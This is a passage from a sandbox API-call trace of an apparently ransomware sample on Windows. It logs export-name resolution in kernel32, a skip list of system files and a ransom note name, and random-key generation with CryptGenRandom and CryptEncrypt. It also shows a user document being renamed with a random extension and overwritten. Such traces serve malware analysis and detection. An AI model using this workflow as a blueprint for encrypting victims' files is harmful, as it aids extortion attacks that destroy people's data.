returned="EncodePointer" [0084.763] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.763] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.763] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.763] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.763] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.763] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.763] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.764] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.764] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.764] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.764] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.764] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.764] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.764] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.764] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.764] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.764] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\NWlwXgs0t5N.rtf") returned 72 [0084.764] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\NWlwXgs0t5N.rtf.5jCNgVE") returned 80 [0084.764] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\NWlwXgs0t5N.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nwlwxgs0t5n.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\NWlwXgs0t5N.rtf.5jCNgVE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nwlwxgs0t5n.rtf.5jcngve"), dwFlags=0x0) returned 1 [0084.765] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.765] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.765] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.765] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dd0e9a0, ftCreationTime.dwHighDateTime=0x1d4c762, ftLastAccessTime.dwLowDateTime=0x923065b0, ftLastAccessTime.dwHighDateTime=0x1d4d193, ftLastWriteTime.dwLowDateTime=0x923065b0, ftLastWriteTime.dwHighDateTime=0x1d4d193, nFileSizeHigh=0x0, nFileSizeLow=0x13801, dwReserved0=0x0, dwReserved1=0x0, cFileName="TTVsSd4P8.doc", cAlternateFileName="TTVSSD~1.DOC")) returned 1 [0084.765] lstrcmpiW (lpString1="TTVsSd4P8.doc", lpString2="DECRYPT-FILES.txt") returned 1 [0084.766] lstrcmpiW (lpString1="TTVsSd4P8.doc", lpString2="autorun.inf") returned 1 [0084.766] lstrcmpiW (lpString1="TTVsSd4P8.doc", lpString2="boot.ini") returned 1 [0084.766] lstrcmpiW (lpString1="TTVsSd4P8.doc", lpString2="desktop.ini") returned 1 [0084.766] lstrcmpiW (lpString1="TTVsSd4P8.doc", lpString2="ntuser.dat") returned 1 [0084.766] lstrcmpiW (lpString1="TTVsSd4P8.doc", lpString2="iconcache.db") returned 1 [0084.766] lstrcmpiW (lpString1="TTVsSd4P8.doc", lpString2="bootsect.bak") returned 1 [0084.766] lstrcmpiW (lpString1="TTVsSd4P8.doc", lpString2="ntuser.dat.log") returned 1 [0084.766] lstrcmpiW (lpString1="TTVsSd4P8.doc", lpString2="thumbs.db") returned 1 [0084.766] lstrcmpiW (lpString1="TTVsSd4P8.doc", lpString2="Bootfont.bin") returned 1 [0084.766] lstrlenW (lpString="TTVsSd4P8.doc") returned 13 [0084.766] lstrcmpiW (lpString1="doc", lpString2="lnk") returned -1 [0084.766] lstrcmpiW (lpString1="doc", lpString2="exe") returned -1 [0084.766] lstrcmpiW (lpString1="doc", lpString2="sys") returned -1 [0084.766] lstrcmpiW (lpString1="doc", lpString2="dll") returned 1 [0084.766] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0084.766] lstrlenW (lpString="TTVsSd4P8.doc") returned 13 [0084.766] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0084.766] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="TTVsSd4P8.doc" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\TTVsSd4P8.doc") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\TTVsSd4P8.doc" [0084.766] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.766] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\TTVsSd4P8.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\ttvssd4p8.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0084.766] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=79873) returned 1 [0084.766] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0084.767] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.767] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.767] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.767] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.767] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0084.768] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0084.769] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.769] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.770] CloseHandle (hObject=0x42c) returned 1 [0084.770] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.770] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0084.771] CloseHandle (hObject=0x0) returned 0 [0084.771] CloseHandle (hObject=0x428) returned 1 [0084.771] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.771] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.771] GetTickCount () returned 0x114da78 [0084.771] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.772] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.772] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.772] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.772] lstrlenA (lpString="kernel32.dll") returned 12 [0084.772] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.772] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.772] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.772] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.773] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.773] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.773] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.773] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.773] lstrlenA (lpString="ADDATOMA") returned 8 [0084.773] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.773] lstrlenA (lpString="ADDATOMW") returned 8 [0084.773] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.773] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.773] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.773] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.773] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.773] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.773] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.773] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.773] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.773] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.773] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.773] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.773] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.773] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.773] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.773] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.773] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.773] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.773] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.773] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.773] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.773] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.773] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.773] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.773] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.773] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.773] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.773] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.773] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.774] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.774] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.774] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.774] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.774] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.774] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.774] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.774] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.774] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.774] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.774] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.774] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.774] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.774] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.774] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.774] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.774] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.774] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.774] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.774] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.774] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.774] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.774] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.774] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.774] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.774] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.774] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.774] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.774] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.774] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.774] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.774] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.774] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.774] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.774] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.774] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.775] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.775] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.775] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.775] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.775] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.775] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.775] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.775] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.775] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.775] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.775] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.775] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.775] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.775] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.775] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.775] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.775] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.775] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.775] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.775] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.775] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.775] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.775] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.775] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.775] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.775] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.775] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.775] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.775] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.775] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.775] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.775] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.775] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.775] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.775] lstrlenA (lpString="BEEP") returned 4 [0084.775] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.776] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.776] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.776] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.776] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.776] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.776] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.776] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.776] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.776] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.776] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.776] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.776] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.776] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.776] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.776] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.776] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.776] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.776] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.776] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.776] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.776] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.776] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.776] lstrlenA (lpString="CANCELIO") returned 8 [0084.776] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.776] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.776] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.776] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.776] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.776] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.776] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.776] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.776] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: 